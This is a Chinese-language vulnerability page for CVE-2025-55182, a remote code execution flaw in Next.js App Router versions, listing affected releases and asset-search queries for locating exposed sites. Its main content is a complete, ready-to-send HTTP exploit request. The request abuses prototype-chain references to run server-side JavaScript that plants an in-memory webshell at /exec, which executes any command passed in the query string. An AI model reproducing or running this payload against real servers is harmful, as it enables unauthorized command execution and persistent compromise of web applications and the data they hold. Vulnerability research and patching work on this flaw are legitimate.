(CVE-2025-55182)ZEIT Next.js 远程代码执行漏洞
当前为私密分享,无需登录即可查看。
| 时间 |
|---|
| 2025-12-05 14:58:21 |
无描述...
漏洞描述
Next.js是一个用于构建全栈Web应用程序的React框架。
ZEIT Next.js存在远程代码执行漏洞,该漏洞源于Next.js 15.x和16.x版本在使用App Router时,依赖了存在缺陷的React服务端DOM包,攻击者可利用该漏洞注入恶意代码远程执行命令。
影响范围
ZEIT Next.js >=15.0.0,<=15.0.4
ZEIT Next.js >=15.1.0,<=15.1.8
ZEIT Next.js >=15.2.*,<=15.5.6
ZEIT Next.js >=16.0.0,<=16.0.6
ZEIT Next.js >=14.3.0,<=canary.77及以上Canary版本
资产测绘
app="Next.js" && body="/_next/static/chunks/app/"
body="react.production.min.js" || body="React.createElement(" || app="React.js" || app="Dify"
POC
POST /apps HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"(async()=>{const http=await import('node:http');const url=await import('node:url');const cp=await import('node:child_process');const originalEmit=http.Server.prototype.emit;http.Server.prototype.emit=function(event,...args){if(event==='request'){const[req,res]=args;const parsedUrl=url.parse(req.url,true);if(parsedUrl.pathname==='/exec'){const cmd=parsedUrl.query.cmd||'whoami';cp.exec(cmd,(err,stdout,stderr)=>{res.writeHead(200,{'Content-Type':'application/json'});res.end(JSON.stringify({success:!err,stdout,stderr,error:err?err.message:null}));});return true;}}return originalEmit.apply(this,arguments);};})();","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
内存马,访问/exec?cmd=ifconfig 执行ifconfig命令。
